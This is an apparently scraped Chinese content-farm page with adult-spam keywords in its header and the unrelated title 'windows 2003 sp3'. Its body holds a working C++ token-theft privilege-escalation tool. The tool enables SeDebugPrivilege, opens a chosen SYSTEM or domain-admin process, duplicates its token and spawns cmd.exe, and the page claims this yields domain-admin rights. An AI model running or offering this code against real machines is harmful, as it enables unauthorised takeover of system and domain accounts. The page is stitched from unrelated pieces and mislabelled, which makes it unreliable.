久久亚洲精品国产精品_羞羞漫画在线版免费阅读网页漫画_国产精品久久久久久久久久久久_午夜dj免费观看在线视频_希崎杰西卡番号

windows 2003 sp3

九賢生活小編 ? ? 電腦百科

前沿拓展:

windows 2003 sp

sp=ServicePack,服務(wù)包的意思,其實(shí)就是補(bǔ)丁的**,一次安裝,之前的 那些系統(tǒng)補(bǔ)丁

SYSTEM->本機(jī)上其他用戶(包括域用戶)(好家伙,只要本機(jī)有system權(quán)限,域管敢在本機(jī)上創(chuàng)建進(jìn)程就直接能拿到域管權(quán)限) 或者admin獲取debug權(quán)限后去獲取SYSTEM權(quán)限(這里有一個(gè)細(xì)節(jié)點(diǎn),只有owner為administrator的SYSTEM進(jìn)程才能被利用,比如lsass,dllhost)

技術(shù)細(xì)節(jié):通過尋找高權(quán)限開啟的進(jìn)程,再**其令牌用以創(chuàng)建新進(jìn)程,即可達(dá)到提權(quán)目的

#include <iostream>
#include <Windows.h>

//Only administrator can get debug priv
BOOL GetDebugPriv() {
HANDLE Token;
TOKEN_PRIVILEGES tp;
LUID Luid;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &Token)) {
std::cout << "OpenProcessToken ERROR" << GetLastError() << std::endl;
return false;
}

tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &Luid)) {
std::cout << "LookupPrivilegeValue ERROR" << GetLastError() << std::endl;
return false;
}
tp.Privileges[0].Luid = Luid;
if (!AdjustTokenPrivileges(Token, FALSE, &tp, sizeof(tp), NULL, NULL) ){
std::cout << "AdjustTokenPrivileges ERROR" << GetLastError() << std::endl;
return false;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
return false;
}
else {
return true;
}
}

int main(int argc, char* argv[]) {
HANDLE t_process;
HANDLE token = NULL;
HANDLE token_bak = NULL;
DWORD process_id;
sscanf_s(argv[1], "%ul", &process_id);
WCHAR command[] = L"C:\Windows\System32\cmd.exe";
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInformation;
ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
startupInfo.cb = sizeof(STARTUPINFO);
std::cout << argv[1] << std::endl;
std::cout << "Openning process PID:" << process_id << std::endl;
if (GetDebugPriv()== TRUE) {
std::cout << "Got the debug priv" << std::endl;
}
else {
std::cout << "GetDebugPriv ERROR" << std::endl;
}
system("whoami /priv");
t_process = OpenProcess(PROCESS_ALL_ACCESS, true, process_id);
if (!t_process) {
std::cout << "OpenProcess ERROR" << GetLastError() << std::endl;
}
if (!OpenProcessToken(t_process, TOKEN_ALL_ACCESS, &token)) {
std::cout << "OpenProcessToken ERROR" << GetLastError() << std::endl;
}

if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &token_bak)) {
std::cout << "DuplicateTokenEx ERROR" << GetLastError() << std::endl;
}
if (!CreateProcessWithTokenW(token_bak, LOGON_WITH_PROFILE, NULL, command, 0, NULL, NULL, &startupInfo, &processInformation)) {
std::cout << "CreateProcessWithTokenW ERROR" << GetLastError() << std::endl;
}
return 0;
}
windows 2003 sp3

這是在win7下的測(cè)試結(jié)果 constadministrator 是域控

windows 2003 sp3

拓展知識(shí):

原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請(qǐng)注明出處:http://www.cddhlm.com/5422.html

(0)
上一篇 2023年 2月 4日 am9:03
下一篇 2023年 2月 4日 am9:09

相關(guān)推薦

  • 海盜船內(nèi)存型號(hào)(海盜船內(nèi)存型號(hào)意思)

    海盜船內(nèi)存的重要性 海盜船作為一家知名的硬件品牌,其所生產(chǎn)的內(nèi)存模塊質(zhì)量非常出色,只需用少量資金就可獲得高質(zhì)量的內(nèi)存模塊。對(duì)于使用者來說,內(nèi)存條的型號(hào)將會(huì)很重要。好的內(nèi)存條不僅能夠…

    電腦百科 2023年 6月 30日

  • 聯(lián)想筆記本電腦怎么查看型號(hào)和配置(聯(lián)想筆記本電腦怎么查看型號(hào)和配置內(nèi)存)

    今天給各位分享聯(lián)想筆記本電腦怎么查看型號(hào)和配置(聯(lián)想筆記本電腦怎么查看型號(hào)和配置內(nèi)存)的知識(shí),其中也會(huì)對(duì)聯(lián)想筆記本電腦怎么查看型號(hào)和配置(聯(lián)想筆記本電腦怎么查看型號(hào)和配置內(nèi)存)進(jìn)行解釋,如果能碰巧解決你現(xiàn)在面臨的問題,別忘了關(guān)注本站,現(xiàn)在開始吧!怎么看電腦配置?電腦配置好不好?詳細(xì)教程來了小伙伴出去買電腦,最關(guān)心的就是電

    電腦百科 2024年 3月 28日

  • 筆記本電腦牌子的標(biāo)志圖片(筆記本電腦牌子排名前十名有哪些)

    筆記本電腦牌子的標(biāo)志圖片(筆記本電腦牌子排名前十名有哪些) 老鐵們好啊,今天小編給大家分享下我們?cè)谑褂秒娔X和筆記本電腦過程中會(huì)遇到的一些問題故障該如何處理,電腦使用的一些小技巧等內(nèi)…

    2023年 8月 8日

  • 華強(qiáng)北電腦配置怎么樣,華強(qiáng)北電腦的配置介紹

    華強(qiáng)北作為國內(nèi)著名的電子市場(chǎng),不僅提供了各種各樣的電子產(chǎn)品,還擁有眾多的電腦賣場(chǎng)。華強(qiáng)北電腦的配置如何,是購買電腦時(shí)常常關(guān)注的問題。下面來介紹一下華強(qiáng)北電腦的配置。 華強(qiáng)北電腦性能…

    電腦百科 2023年 4月 13日

  • 聯(lián)想樂檬k3note(聯(lián)想樂檬k3note安卓8)

    聯(lián)想樂檬k3note(聯(lián)想樂檬k3note安卓8) 老鐵們好啊,今天小編給大家分享下我們?cè)谑褂秒娔X過程中會(huì)遇到的一些問題故障該如何處理,熱門電腦游戲需求配置,電腦使用的一些小技巧 …

    2023年 9月 8日

  • 加密文件(加密文件夾怎么設(shè)置密碼)

    前沿拓展: 日常使用電腦過程中,總會(huì)有一些比較重要或者比較隱私的文件,不想被別人看到。那么,我們就需要對(duì)這些文件進(jìn)行加密。當(dāng)然,我們可以將這些文件都放在一個(gè)隱私文件夾,第二將該文件…

    2023年 2月 18日

  • 聯(lián)想x230剛上市多少錢(聯(lián)想X230多少錢)

    聯(lián)想x230剛上市多少錢(聯(lián)想X230多少錢) 老鐵們好啊,今天小編給大家分享下我們?cè)谑褂秒娔X過程中會(huì)遇到的一些問題故障該如何處理,熱門電腦游戲需求配置,電腦使用的一些小技巧 聯(lián)想…

    2023年 9月 6日

  • hkcf3000怎么樣,hkcf3000是不是最好的選擇

    hkcf3000的參數(shù)有哪些? hkcf3000有21.5英寸屏幕、分辨率為1920×1080、亮度為250cd/㎡、對(duì)比度為1000:1、響應(yīng)時(shí)間為5ms、刷新率為60…

    電腦百科 2023年 4月 25日

  • 添加打印機(jī)(添加打印機(jī)快捷鍵ctrl加什么)

    前沿拓展: 添加打印機(jī) 該問題是因?yàn)镻rint Spooler停止工作導(dǎo)致的,重新啟動(dòng)以后能解決。步驟如下: 1、直接通過Win+R鍵彈出運(yùn)行框,確定輸入***.msc。 2 1、…

    2023年 2月 10日

  • 工作站內(nèi)存容量為2048m

    工作站內(nèi)存容量為2048m 工作站是工作室中非常重要的一部分,它是影響工作效率的關(guān)鍵。而內(nèi)存大小則是決定了工作站處理程序時(shí)的容量。本篇文章將探討工作站內(nèi)存容量為2048m的優(yōu)勢(shì)及問…

    電腦百科 2023年 7月 1日